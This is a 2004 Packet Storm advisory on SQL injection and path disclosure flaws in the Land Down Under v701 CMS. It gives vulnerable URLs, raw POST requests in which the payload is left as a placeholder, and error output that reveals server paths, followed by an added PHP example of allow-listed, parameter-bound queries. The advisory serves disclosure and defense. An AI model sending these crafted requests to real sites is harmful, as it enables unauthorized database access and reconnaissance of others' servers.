mp-ldu.txt

2004-11-02T00:00:00
ID PACKETSTORM:34906
Type packetstorm
Reporter maxpatrol.com
Modified 2004-11-02T00:00:00

Description

                                        
`Multiple SQL-injections in Land Down Under v701  
Date: 30.10.04  
Application: Land Down Under v701  
Platform: PHP  
Severity: Medium  
Link: http://www.neocrome.net  
  
Vendor Status  
Vulnerabilities have been fixed.  
  
  
Details  
  
An input validation vulnerability was reported in Land Down Under v701. A remote user can conduct SQL injection attacks.  
  
  
1. SQL-injections in GET  
/users.php?f=1&s=1'[sql code here]&w=asc&d=50  
/users.php?f=1&s=name&w=1'[sql code here]&d=50  
/users.php?f=1&s=name&w=asc&d=1'[sql code here]  
/users.php?f=1&s=1'[sql code here]&w=asc  
/users.php?f=1&s=name&w=1'[sql code here]  
/comments.php?id=1"[sql code here]  
  
  
  
2. SQL-injections in POST  
POST /auth.php?m=register&a=add HTTP/1.1  
Host: www.neocrome.net  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1  
  
POST /auth.php?m=register&a=add HTTP/1.1  
Host: www.neocrome.net  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 102  
  
rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1  
  
  
  
3. Path disclosures:  
/plug.php?h=1'  
Result:  
<...>  
<br />  
<b>Warning</b>: fopen(system/help/1.txt): failed to open stream: No such file or directory in <b>/home/neocrome/public_html/system/core/plug.inc.php</b> on line <b>266</b><br/>  
Couldn't find a file : system/help/1.txt  
<...>  
  
POST /auth.php?m=login&a=check HTTP/1.1  
Host: www.neocrome.net  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 52  
  
PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1  
  
  
  
Result:  
<...>  
ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/home/neocrome/public_html/system/common.php</b> on line <b>169</b><br />  
<...>  
  
  
  
Impact  
A remote user can execute SQL commands on the underlying database.  
  
Solution  
Check for update: http://www.neocrome.net/index.php?msingle&id91.  
`
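
Added example (not code from the advisory or from Land Down Under): a hardened list handler for the users.php request shapes in item 1. It assumes s, w and d are the sort column, sort direction and a numeric offset, and uses hypothetical table and column names; because ORDER BY identifiers cannot be bound as parameters, they go through an allow-list, while the numeric value is validated and bound.

```php
<?php
declare(strict_types=1);

// Added example, not Land Down Under code. Table and column names are hypothetical;
// s, w and d are assumed to be sort column, sort direction and row offset.
const SORT_COLUMNS = ['name' => 'user_name', 'regdate' => 'user_regdate', 'country' => 'user_country'];
const SORT_WAYS    = ['asc' => 'ASC', 'desc' => 'DESC'];

/** Returns [SQL text, offset]; no request byte is ever copied into the SQL text. */
function buildUserListQuery(array $get): array
{
    $s = is_string($get['s'] ?? null) ? $get['s'] : 'name';
    $w = is_string($get['w'] ?? null) ? strtolower($get['w']) : 'asc';
    $d = $get['d'] ?? '0';
    // Identifiers and keywords cannot be bound as parameters, so they are looked up
    // in an allow-list; unknown values fall back to a default.
    $column = SORT_COLUMNS[$s] ?? SORT_COLUMNS['name'];
    $way    = SORT_WAYS[$w] ?? SORT_WAYS['asc'];
    // The offset must be 1 to 6 decimal digits; anything else becomes 0.
    $offset = (is_string($d) && ctype_digit($d) && strlen($d) <= 6) ? (int) $d : 0;
    return ["SELECT user_id, user_name FROM users ORDER BY $column $way LIMIT 50 OFFSET :offset", $offset];
}

function listUsers(PDO $db, array $get): array
{
    [$sql, $offset] = buildUserListQuery($get);
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT); // values are always bound
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN, 1);         // user_name column
}

// Constructed sample rows in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT, user_regdate INTEGER, user_country TEXT)');
$db->exec("INSERT INTO users (user_name, user_regdate, user_country) VALUES ('carol', 3, 'au'), ('alice', 1, 'nz'), ('bob', 2, 'au')");

// The three request shapes from item 1, using the advisory's own placeholder text.
$probe = "1'[sql code here]";
$requests = [
    ['s' => $probe, 'w' => 'asc',  'd' => '0'],
    ['s' => 'name', 'w' => $probe, 'd' => '0'],
    ['s' => 'name', 'w' => 'desc', 'd' => $probe],
];
foreach ($requests as $get) {
    echo buildUserListQuery($get)[0], ' => ', implode(',', listUsers($db, $get)), "\n";
}
```

The same value binding covers the quoted id in comments.php and the registration fields in item 2, since those are values rather than identifiers.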